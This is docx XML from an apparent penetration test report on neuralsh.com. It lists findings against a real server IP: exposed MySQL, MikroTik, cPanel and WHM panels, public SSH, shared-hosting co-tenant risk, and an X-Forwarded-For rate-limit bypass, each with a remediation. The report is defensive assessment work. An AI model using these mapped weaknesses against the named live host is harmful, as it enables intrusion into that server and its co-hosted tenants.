          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>HSTS with preload (max-age=15552000)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Enforced — prevents SSL stripping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>X-Frame-Options: DENY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Active — prevents clickjacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>X-Content-Type-Options: nosniff</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Active — prevents MIME confusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>TLS 1.0 and 1.1 disabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Only TLS 1.2 and 1.3 accepted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>JWT uses UUID for tid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Token IDs are not sequential or predictable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>alg:none JWT attack blocked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>JWT validation is implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Zone transfer blocked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>DNS zone is not publicly exposed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Table 12: Positive security controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.3 Finding Details</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The following section presents each finding with a standardized card format: severity band, affected host, tool used, combined description and impact assessment, remediation recommendation, and evidence reference.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-001 · MySQL Port 3306 Exposed to Internet Critical CVSS 9.8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Host: 103.16.62.217:3306 | Tool: Nmap, mysql-client</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The MySQL 8.0.43 database server is directly accessible from the public internet on port 3306, accepting full TCP connections from any external IP. An attacker does not need to compromise the web application to reach the database — they can attempt authentication directly at the database layer, bypassing all application-level controls. Brute-force or credential-stuffing attacks against this port are possible with no rate limiting or IP-based blocking at the database layer. If credentials are obtained, an attacker gains full read and write access to all application databases, potentially including user records, session data, and API secrets. MySQL's User Defined Function (UDF) feature could further be abused for remote command execution on the server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Remediation: Restrict port 3306 to localhost or a trusted management VPN via firewall rules. Never expose database ports to the public internet under any circumstances.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Evidence: Figure 4.9 — Nmap scan output confirming 3306/tcp open mysql MySQL 8.0.43</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-002 · MikroTik Admin Panel Exposed (Port 9001) Critical CVSS 9.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Host: 103.16.62.217:9001 | Tool: Nmap, curl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The MikroTik RouterOS web configuration interface is publicly accessible on port 9001, returning HTTP 200 with a fully rendered login page. The login form pre-fills admin as the default username. MikroTik devices ship with a factory default of admin / blank password — if this default has not been changed, full network device control is available without any credential knowledge. An attacker with access to RouterOS can modify routing tables, capture all network traffic in promiscuous mode, create persistent backdoor accounts, remove firewall rules, and disrupt all hosted services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Remediation: Restrict port 9001 to a trusted management IP via firewall. Change MikroTik default credentials immediately. Disable unused RouterOS services (telnet, FTP, API).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Evidence: Figure 4.11 — curl response showing RouterOS router configuration page</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-013 · cPanel Admin Panel Exposed (Port 2083) Critical CVSS 9.8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Host: 103.16.62.217:2083 | Tool: Nmap, curl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The cPanel web hosting control panel is publicly accessible on port 2083 with no IP restriction and no two-factor authentication prompt. cPanel provides full management of the hosting account: file manager (read and write all web application files), database management via phpMyAdmin, email account control, FTP credential creation, and subdomain configuration. A password reset link is present on the login page — if an attacker can compromise the registered email account, they can reset the cPanel password and gain full access without brute force.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Remediation: Restrict port 2083 to trusted management IPs via Cloudways firewall. Enable two-factor authentication on cPanel immediately.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Evidence: Figure 4.10 — curl response showing cPanel Login title</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-014 · WHM Root Panel Exposed (Port 2087) Critical CVSS 10.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Host: 103.16.62.217:2087 | Tool: Nmap, curl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>WHM (Web Host Manager) is the root-level server administration panel for cPanel-based servers. It is publicly accessible on port 2087 with no IP restriction, no two-factor authentication, and no account lockout. WHM access is functionally equivalent to root shell access: it provides a built-in Terminal feature, the ability to create and manage all cPanel accounts on the server, root-level database access, and full server configuration control. An attacker who gains WHM access compromises not only neuralsh.com but every other hosted domain on the shared server simultaneously. This is the highest-severity finding in the engagement, receiving the maximum CVSS score of 10.0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Remediation: Immediately firewall port 2087 to trusted IPs only. This single action eliminates the highest-risk vector in the entire engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Evidence: Figure 4.10 — curl response showing WHM Login title</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-003 · SSH Port 22 Publicly Accessible High CVSS 7.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Host: 103.16.62.217:22 | Tool: Nmap, ssh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>OpenSSH 8.9p1 is publicly accessible on port 22. SSH key-based authentication was confirmed as the enforced method for tested usernames, which reduces the immediate risk; however, the port remains exposed to brute-force attempts for any account that may have password authentication enabled. The SMTP banner (163-47-172-131.cprapid.com) revealed this is a cPanel shared hosting server where the primary user typically has sudo privileges, making successful SSH compromise equivalent to root access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Remediation: Enforce PasswordAuthentication no in /etc/ssh/sshd_config. Install fail2ban with aggressive thresholds. Restrict SSH to a trusted management IP via firewall.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Evidence: Figure 4.9 — Nmap scan confirming 22/tcp open OpenSSH 8.9p1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-004 · Shared Hosting Lateral Movement Risk High CVSS 7.5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Host: 103.16.62.217 (shared infrastructure) | Tool: openssl, curl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The origin server is a shared cPanel hosting environment (Cloudways/cprapid.com) hosting multiple clients on the same physical server. SSL certificates issued to *.onesala.com and www.endoncambodia.com confirmed the presence of other tenants. On shared cPanel hosting, a single WHM-level compromise grants an attacker access to the files, databases, and email of every co-hosted account simultaneously. A compromise of neuralsh.com's hosting account could therefore constitute a data breach affecting organizations that have no relationship with neuralsh.com and no awareness of its security posture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Remediation: Migrate neuralsh.com to a dedicated server or isolated cloud instance. In the short term, ensure WHM is firewalled immediately to eliminate the most direct lateral movement path.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Evidence: Figure 4.8 — SSL certificate showing onesala.com and endoncambodia.com on same origin server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-005 · Rate Limit Bypass via X-Forwarded-For Header Spoofing High CVSS 9.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Host: neuralsh.com/web/v1/init/token | Tool: Burp Suite, curl, Python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The application's rate-limiting mechanism uses the client-supplied X-Forwarded-For header as the identifier for tracking request rates per IP. Because X-Forwarded-For is fully controllable by the client, an attacker can supply a different random IP value on each request, making every request appear to come from a unique source. Exploitation was confirmed with a 100% success rate: 50 consecutive requests were sent with rotating X-Forwarded-For values and all 50 received HTTP 200 responses — not a single rate-limit response was returned. This bypass applies not only to the token endpoint but to any endpoint on the platform that relies on the same IP-tracking logic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Remediation: Replace X-Forwarded-For with Cloudflare's CF-Connecting-IP header for all rate-limiting logic. CF-Connecting-IP is set by Cloudflare and cannot be spoofed by the client.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Evidence: Figure 4.15 — Rate limit bypass results showing 50/50 tokens, 0 rate-limit responses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-007 · Unauthenticated JWT Token Issuance Medium CVSS 5.3</w:t>
